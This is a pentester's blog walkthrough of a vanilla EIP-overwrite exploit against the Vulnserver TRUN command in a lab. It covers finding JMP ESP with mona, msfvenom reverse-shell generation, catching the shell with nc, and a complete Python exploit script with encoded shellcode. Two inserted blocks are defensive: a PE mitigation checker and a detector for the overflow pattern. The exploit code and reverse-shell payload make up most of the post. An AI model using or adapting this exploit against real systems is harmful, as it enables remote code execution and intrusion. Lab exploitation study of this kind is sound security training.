Vulnserver TRUN – This Time, We Go Vanilla (EIP)

This post will be a little shorter, but I wanted to finish up my vulnserver TRUN exploit paths.

Vulnserver TRUN - Introduction

If you haven't read my previous write-up on the "TRUN" command, then I suggest you start with that one.

This exploit will pick up somewhere in the middle of the last one, with a different exploit path.

In this case, I will go with the standard vanilla EIP overwrite with a JMP ESP. For another example, you can visit the following write-up.

Finding the Jump

First, I started by taking a look at the modules again.

Vulnserver TRUN - Modules

In this case, I decided to use essfunc.dll, as I would not need to worry about null bytes in its addresses.

Next, I used mona to search for a JMP ESP in the library.

!mona find -s "\xff\xe4" -m essfunc.dll    (ff e4 = JMP ESP)

Vulnserver TRUN - JMP ESP
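A hardcoded return address only stays valid while the module that contains it loads at the same base on every run, which is what a missing ASLR opt-in allows. The following added example (not code from the original post) audits a PE image's DllCharacteristics field for the ASLR and DEP opt-in flags; the `sample_header` helper and its bytes are constructed for the demo and do not come from essfunc.dll.

```python
import struct

# DllCharacteristics bits defined by the PE/COFF specification.
DYNAMIC_BASE = 0x0040  # image may be relocated at load time (ASLR)
NX_COMPAT = 0x0100     # image is marked compatible with DEP


def dll_characteristics(image: bytes) -> int:
    """Return the DllCharacteristics field of a PE32 or PE32+ image."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image: missing PE signature")
    opt = e_lfanew + 4 + 20  # skip the signature and the 20-byte COFF header
    if len(image) < opt + 72:
        raise ValueError("truncated optional header")
    (magic,) = struct.unpack_from("<H", image, opt)
    if magic not in (0x10B, 0x20B):  # PE32 / PE32+
        raise ValueError("unknown optional header magic")
    # DllCharacteristics sits at offset 70 in both header variants.
    (flags,) = struct.unpack_from("<H", image, opt + 70)
    return flags


def missing_mitigations(image: bytes) -> list:
    """List the opt-in mitigations the image does not declare."""
    flags = dll_characteristics(image)
    missing = []
    if not flags & DYNAMIC_BASE:
        missing.append("ASLR")
    if not flags & NX_COMPAT:
        missing.append("DEP")
    return missing


def sample_header(flags: int) -> bytes:
    """Constructed minimal PE32 header (not a real DLL) for the demo."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    optional = bytearray(96)
    struct.pack_into("<H", optional, 0, 0x10B)
    struct.pack_into("<H", optional, 70, flags)
    return dos + b"PE\0\0" + b"\0" * 20 + bytes(optional)


if __name__ == "__main__":
    print(missing_mitigations(sample_header(0x0000)))
    print(missing_mitigations(sample_header(DYNAMIC_BASE | NX_COMPAT)))
```

To audit a real build output, pass the file's bytes to `missing_mitigations` and fail the build when the list is not empty.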

Verifying the Jump

I selected one of the instructions randomly (0x625011af), and updated my payload.

buffer += "\x90" * 2001
# 0x625011af = JMP ESP
buffer += "\xaf\x11\x50\x62"
buffer += "\xcc" * (5000 - len(buffer))

As you can see, the breakpoint was hit as expected.

Vulnserver TRUN - Breakpoint

Additionally, the stack holds my \xcc interrupt bytes, so the exploit can now be finished!

Vulnserver TRUN - Stack

Reverse Shell

With my skeleton in place, I generated some reverse shellcode to connect back to me.

root@kali:~/vulnserver# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -b "\x00" -f py
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of py file: 1684 bytes

Once I added the new shellcode to my exploit, I resent the full payload.

root@kali:~/vulnserver# python trun_eip_reverse.py
Welcome to Vulnerable Server! Enter HELP for help.

[+] Sending exploit...

As you can see, I was able to catch the reverse shell and complete the exploit!

root@kali:~/vulnserver# nc -lvp 4444
listening on [any] 4444 ...
192.168.0.2: inverse host lookup failed: Unknown host
connect to [192.168.0.1] from (UNKNOWN) [192.168.0.2] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\IEUser\Downloads\vulnserver-master> whoami
whoami
ie8win7\ieuser

C:\Users\IEUser\Downloads\vulnserver-master>

Vulnserver TRUN - Reverse Shell

Additionally, the server was not crashing at all, as seen in the following screenshot.

Vulnserver TRUN - Server

Final Code

Here is the final exploit that I used for my reverse shell.

#!/usr/bin/python

import socket
import os
import sys

host = "192.168.0.2"
port = 9999

buf =  ""
buf += "\xbe\x97\x7c\x63\x8e\xdb\xc8\xd9\x74\x24\xf4\x5f\x2b"
buf += "\xc9\xb1\x52\x31\x77\x12\x83\xef\xfc\x03\xe0\x72\x81"
buf += "\x7b\xf2\x63\xc7\x84\x0a\x74\xa8\x0d\xef\x45\xe8\x6a"
buf += "\x64\xf5\xd8\xf9\x28\xfa\x93\xac\xd8\x89\xd6\x78\xef"
buf += "\x3a\x5c\x5f\xde\xbb\xcd\xa3\x41\x38\x0c\xf0\xa1\x01"
buf += "\xdf\x05\xa0\x46\x02\xe7\xf0\x1f\x48\x5a\xe4\x14\x04"
buf += "\x67\x8f\x67\x88\xef\x6c\x3f\xab\xde\x23\x4b\xf2\xc0"
buf += "\xc2\x98\x8e\x48\xdc\xfd\xab\x03\x57\x35\x47\x92\xb1"
buf += "\x07\xa8\x39\xfc\xa7\x5b\x43\x39\x0f\x84\x36\x33\x73"
buf += "\x39\x41\x80\x09\xe5\xc4\x12\xa9\x6e\x7e\xfe\x4b\xa2"
buf += "\x19\x75\x47\x0f\x6d\xd1\x44\x8e\xa2\x6a\x70\x1b\x45"
buf += "\xbc\xf0\x5f\x62\x18\x58\x3b\x0b\x39\x04\xea\x34\x59"
buf += "\xe7\x53\x91\x12\x0a\x87\xa8\x79\x43\x64\x81\x81\x93"
buf += "\xe2\x92\xf2\xa1\xad\x08\x9c\x89\x26\x97\x5b\xed\x1c"
buf += "\x6f\xf3\x10\x9f\x90\xda\xd6\xcb\xc0\x74\xfe\x73\x8b"
buf += "\x84\xff\xa1\x1c\xd4\xaf\x19\xdd\x84\x0f\xca\xb5\xce"
buf += "\x9f\x35\xa5\xf1\x75\x5e\x4c\x08\x1e\xa1\x39\x12\xdf"
buf += "\x49\x38\x12\xce\xd5\xb5\xf4\x9a\xf5\x93\xaf\x32\x6f"
buf += "\xbe\x3b\xa2\x70\x14\x46\xe4\xfb\x9b\xb7\xab\x0b\xd1"
buf += "\xab\x5c\xfc\xac\x91\xcb\x03\x1b\xbd\x90\x96\xc0\x3d"
buf += "\xde\x8a\x5e\x6a\xb7\x7d\x97\xfe\x25\x27\x01\x1c\xb4"
buf += "\xb1\x6a\xa4\x63\x02\x74\x25\xe1\x3e\x52\x35\x3f\xbe"
buf += "\xde\x61\xef\xe9\x88\xdf\x49\x40\x7b\x89\x03\x3f\xd5"
buf += "\x5d\xd5\x73\xe6\x1b\xda\x59\x90\xc3\x6b\x34\xe5\xfc"
buf += "\x44\xd0\xe1\x85\xb8\x40\x0d\x5c\x79\x70\x44\xfc\x28"
buf += "\x19\x01\x95\x68\x44\xb2\x40\xae\x71\x31\x60\x4f\x86"
buf += "\x29\x01\x4a\xc2\xed\xfa\x26\x5b\x98\xfc\x95\x5c\x89"

buffer = "\x90" * 2001
# 0x625011af = JMP ESP
buffer += "\xaf\x11\x50\x62"
buffer += "\x90" * 16
buffer += buf
buffer += "\x90" * (5000 - len(buffer))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((host,port))

print s.recv(1024)

print "[+] Sending exploit..."

s.send("TRUN  /.../" + buffer)

print s.recv(1024)

s.close()
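On the wire, this payload has a recognizable shape: a TRUN command followed by thousands of bytes, a long run of \x90, and mostly non-printable data. The following added example (not part of the original post) is a detection sketch that inspects a client message sent to the service; the thresholds and the `inspect_message` name are assumptions, and the sample messages are constructed, with \xcc filler in place of shellcode.

```python
import re

MAX_ARG_LEN = 256        # assumed policy limit for a command argument
BINARY_RATIO = 0.3       # assumed share of non-printable bytes that is suspicious
NOP_SLED = re.compile(rb"\x90{16,}")  # 16 or more consecutive NOP bytes


def inspect_message(payload: bytes) -> list:
    """Return the reasons a client message looks like a TRUN overflow attempt."""
    verb, _, arg = payload.partition(b" ")
    if verb.strip().upper() != b"TRUN":
        return []
    arg = arg.rstrip(b"\r\n")
    reasons = []
    if len(arg) > MAX_ARG_LEN:
        reasons.append("oversized")
    if NOP_SLED.search(arg):
        reasons.append("nop-sled")
    non_printable = sum(1 for b in arg if b < 0x20 or b > 0x7E)
    if arg and non_printable / len(arg) > BINARY_RATIO:
        reasons.append("binary")
    return reasons


def constructed_samples() -> dict:
    """Constructed messages: two benign ones and one shaped like the skeleton."""
    skeleton = b"\x90" * 2001 + b"\xaf\x11\x50\x62"
    skeleton += b"\xcc" * (5000 - len(skeleton))
    return {
        "help": b"HELP\r\n",
        "short_trun": b"TRUN hello\r\n",
        "overflow": b"TRUN /.../" + skeleton,
    }


if __name__ == "__main__":
    for name, message in constructed_samples().items():
        print(name, inspect_message(message))
```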

Vulnserver TRUN - Conclusion

This finishes up the TRUN command, although this exploit was obviously easier than the last one.

I'm hoping to finish up the rest of the commands soon, but that might have to wait for some other posts.

You can find the final exploit in my GitHub repository, but let me know if you think there is anything that I should add.

Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.

When he's not figuring out what cert to get next or side project to work on, he enjoys playing video games, traveling, and watching sports.
